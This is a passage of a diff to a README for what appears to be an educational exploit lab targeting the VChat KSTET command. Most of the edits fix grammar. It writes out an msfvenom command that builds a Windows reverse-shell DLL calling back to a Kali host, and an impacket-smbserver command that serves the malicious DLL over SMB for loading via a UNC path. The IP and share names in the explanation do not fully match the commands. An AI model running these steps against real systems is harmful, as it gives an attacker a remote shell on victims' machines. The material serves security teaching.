xinwenfu/VChat_KSTET_DLL/README.md

 ```
 $ msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.0.2.15 LPORT=8080 EXITFUNC=none -f dll -o mal.dll
 ```
-* `-a x86`: Specify this is against a 32 bit program.
+* `-a x86`: Specify this is against a 32-bit program.
 * `--platform windows`: Specify this is against a process on a Windows system.
 * `-p `: Payload we are generating shellcode for.
     * `windows/shell_reverse_tcp`: Reverse TCP payload for Windows
-    * `LHOST=10.0.2.7`: The remote listening host's IP, in this case our Kali machine's IP `10.0.2.7`.
+    * `LHOST=10.0.2.7`: The remote listening host's IP, in this case, our Kali machine's IP, `10.0.2.7`.
     * `LPORT=8080`: The port on the remote listening host's traffic should be directed to in this case port 8080.
     * `EXITFUNC=none`: The runs without an exit function, the program will likely crash after this finishes executing!
 * `-f`: The output format.
     * `dll`: Format for use as a DLL.

 Now we know from the [UNC](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-dtyp/62e862f4-2a51-452e-8eeb-dc4ff5ee33cc) datatype that we have to provide a string in the form `= "\\" host-name "\" share-name  [ "\" object-name ]` when attempting to load and attach a DLL to our process.
 In our case this could be something like `\\10.0.2.15\A\mal.dll` where `10.0.2.15` is the IP of the Kali, `ABCD` is the name of our SMB share and `mal.dll` is the malicious DLL object we are sharing.
-So we can generate a SMB share using the following command.
-This should be ran in the directory that contains the malicious DLL `mal.dll`.
+So we can generate an SMB share using the following command.
+This should be run in the directory that contains the malicious DLL `mal.dll`.
 ```
 $ sudo impacket-smbserver -smb2support ABCD .
 ```
-* `sudo`: This command and operation requires root privileges to bind to the well known SMB port 445.
+* `sudo`: This command and operation requires root privileges to bind to the well-known SMB port 445.
 * [`impacket-smbserver`](https://www.kali.org/tools/impacket-scripts/#impacket-smbserver):  This is the command the launches a SMB server and add a share as specified.
 * `smb2support`: Enable SMB2 Support.
 * `A`: Name of the current Share.
 This is chosen to be short as we would complicate the shellcode generation otherwise.